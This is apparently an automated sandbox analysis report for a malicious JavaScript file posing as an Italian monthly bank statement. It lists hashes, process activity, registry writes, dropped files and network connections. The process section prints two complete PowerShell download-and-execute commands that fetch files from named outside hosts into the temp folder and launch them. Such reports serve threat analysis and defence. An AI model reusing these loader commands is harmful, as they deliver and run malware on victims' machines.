File name:

_2019_20180508-Estratto_conto_mensile_0000_110755 198.js

Full analysis: https://app.any.run/tasks/6b6be248-d203-48b0-9ad7-e09fbb7bf169
Verdict: Malicious activity
Analysis date: January 18, 2019, 13:15:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

8455A490D13EADBD7C6B2F48BF12D0F2

SHA1:

D95224946EB3E0387B8FB5AFA51C0FBDDE414F3B

SHA256:

8CD0E517C0FE3CCB6B18DD25BE792216DF215989E6AACA84AC32B5DE3863BDD4

SSDEEP:

96:xsO4hKPEOUgp4kVUqE5mVYq4F5UP5QYb2ISRcNtaCw2kG0XH2/sf:xszkMOUgUIGqt25RcNt7h0XSY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Reads Internet Cache Settings

      • powershell.exe (PID: 2820)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • powershell.exe (PID: 2820)

    • Executes PowerShell scripts

      • WScript.exe (PID: 3380)

    • Creates files in the user directory

      • powershell.exe (PID: 2820)
      • powershell.exe (PID: 2640)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe powershell.exe PhotoViewer.dll no specs

Process information

PID
CMD
Path
Indicators
Parent process
2640"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xttygfec = New-Object -ComObject Msxml2.XMLHTTP; $fhbgzs = New-Object -ComObject ADODB.Stream; $iaxvyfxxa = $env:temp + '' + 'jucheckx64.exe';$xttygfec.open('GET', 'http://img.martatovaglieri.it/index?35709', $false);$xttygfec.send(); if($xttygfec.Status -eq "200"){$fhbgzs.open();$fhbgzs.type = 1;$fhbgzs.write($xttygfec.responseBody);$fhbgzs.position = 0;$fhbgzs.savetofile($iaxvyfxxa);$fhbgzs.close();} Start-Process $iaxvyfxxa;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2820"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xttygfec = New-Object -ComObject Msxml2.XMLHTTP; $fhbgzs = New-Object -ComObject ADODB.Stream; $iaxvyfxxa = $env:temp + '' +'hp51215.jpg';$xttygfec.open('GET', 'http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg?16800', $false);$xttygfec.send(); if($xttygfec.Status -eq "200"){$fhbgzs.open();$fhbgzs.type = 1;$fhbgzs.write($xttygfec.responseBody);$fhbgzs.position = 0;$fhbgzs.savetofile($iaxvyfxxa);$fhbgzs.close();} Start-Process $iaxvyfxxa;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3144C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3380"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_2019_20180508-Estratto_conto_mensile_0000_110755 198.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
993
Read events
852
Write events
141
Delete events
0

Modification events

(PID) Process:(2640) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3380) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3380) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2820) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
4
Text files
11
Unknown types
3

Dropped files

PID
Process
Filename
Type
2640powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KMAXPJMDSMV07CV8T29B.temp
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HK6KVOX9XUNX7SM8SIBM.temp
MD5:
SHA256:
2640powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1988cd.TMPbinary
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\MVCLYGZF\auguri-di-capodanno-2019[1].jpgimage
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Local\Temphp51215.jpgimage
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:
SHA256:
2640powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1988fc.TMPbinary
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2820powershell.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\7QOGMK22\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2640
powershell.exe
GET
109.230.199.77:80
http://img.martatovaglieri.it/index?35709
SE
malicious
2820
powershell.exe
GET
200
62.141.56.35:80
http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg?16800
DE
image
264 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2640
powershell.exe
109.230.199.77:80
img.martatovaglieri.it
Portlane AB
SE
malicious
2820
powershell.exe
62.141.56.35:80
www.flpscuolafoggia.it
Keyweb AG
DE
unknown

DNS requests

Domain
IP
Reputation
img.martatovaglieri.it
  • 109.230.199.77
malicious
www.flpscuolafoggia.it
  • 62.141.56.35
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_2019_20180508-Estratto_conto_mensile_0000_110755 198.js